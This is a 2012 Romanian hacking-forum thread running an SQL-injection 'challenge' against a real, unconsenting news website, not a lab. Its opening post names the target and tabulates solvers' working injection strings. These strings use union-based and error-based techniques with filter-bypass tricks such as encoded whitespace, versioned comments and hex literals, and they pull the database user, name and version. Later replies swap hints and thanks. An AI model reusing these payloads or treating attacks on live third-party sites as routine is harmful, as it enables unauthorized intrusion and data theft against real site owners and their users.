Wubi Posted October 3, 2012 Report Share Posted October 3, 2012 (edited) Nu...Target: News: Scene sexy per Alanis - NewsicMetoda: Union BasedCerinte: User(),Database() sau Version().Proof:Site-ul e gasit de Sheyken...[TABLE=class: grid, width: 800][TR][TD]Solvers:[/TD][TD]Syntax:[/TD][/TR][TR][TD]Sheyken[/TD][TD]+union%0Aselect+1,2,3,4,5,6,7,8,9,10,11,12,13,14,version(),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30-- /* and */ ?id=-25890+or+1+group+by+concat_ws(0x7e,version(),floor(rand(0)*2))+having+min(0)+or+1--[/TD][/TR][TR][TD]fallen_angel[/TD][TD]?id=-25890+uNion+/*!se%6cect*/+1,2,3,4,5,6,7,@@version,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+-[/TD][/TR][TR][TD]neo.hapsis[/TD][TD]?id=null%0Dunion%0Dselect+1,2,3,4,5,NULL,0x3c623e6e656f2e686170736973,0x7468616e6b7320666f7220746865206368616c6c656e6765,9,10,11,12,13,14,group_concat(user(),0x3a,database(),0x3a,version()),16,17,18,19,20,21,22,23,24,25,26,NULL,28,29,30--[/TD][/TR][TR][TD]Sweby[/TD][TD]?id=25890+and+1=2+UNION%0BSELECT+1,2,3,4,5,user(),group_concat(version(),0x3a,database()),8,9,10,11,12,13,14,concat(0x49206861746520746f20627970617373207468696e6773),16,17,18,19,20,21,22,23,24,25,26,27,28,29,30--+/*[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][TR][TD][/TD][TD]-[/TD][/TR][/TABLE] Edited October 8, 2012 by Wubi Link to comment Share on other sites More sharing options...
fallen_angel Posted October 3, 2012 Report Share Posted October 3, 2012 Ai PM. Nu mai urc poz? c?-s pe digi mobil ?i merge ca ochiu mortului Link to comment Share on other sites More sharing options...
neo.hapsis Posted October 3, 2012 Report Share Posted October 3, 2012 Done! Mersi ptr challenge! Link to comment Share on other sites More sharing options...
EterNo Posted October 5, 2012 Report Share Posted October 5, 2012 ar fi frumos dupa ce terminati competitia sa postati si o syntaxa sa intelegem si noi, eu numaru de coloane am reusit sa-l gasesc da dupa imi da ACCES NEGAT cand scriu select Link to comment Share on other sites More sharing options...
Wubi Posted October 5, 2012 Author Report Share Posted October 5, 2012 ar fi frumos dupa ce terminati competitia sa postati si o syntaxa sa intelegem si noi, eu numaru de coloane am reusit sa-l gasesc da dupa imi da ACCES NEGAT cand scriu select Daca ai fi urmarit challenge-urile precedente(https://rstcenter.com/forum/59702-easy-sqli-2-a.rst ; https://rstcenter.com/forum/59689-easy-tricky-sqli.rst), ori chiar mai atent tabelul cu solveri din primul post, al 2lea row este dedicat sintaxelor folosite. Cand voi decide sa termin challenge-ul voi adauga si sintaxele. Pana atunci mai incearca, hint: bypass. Link to comment Share on other sites More sharing options...
Sweby Posted October 5, 2012 Report Share Posted October 5, 2012 (edited) Edited October 5, 2012 by Sweby Link to comment Share on other sites More sharing options...
gafi Posted October 8, 2012 Report Share Posted October 8, 2012 Cand vedem rezultatele? Link to comment Share on other sites More sharing options...
Wubi Posted October 8, 2012 Author Report Share Posted October 8, 2012 Cand vedem rezultatele? Acum.Closed. Link to comment Share on other sites More sharing options...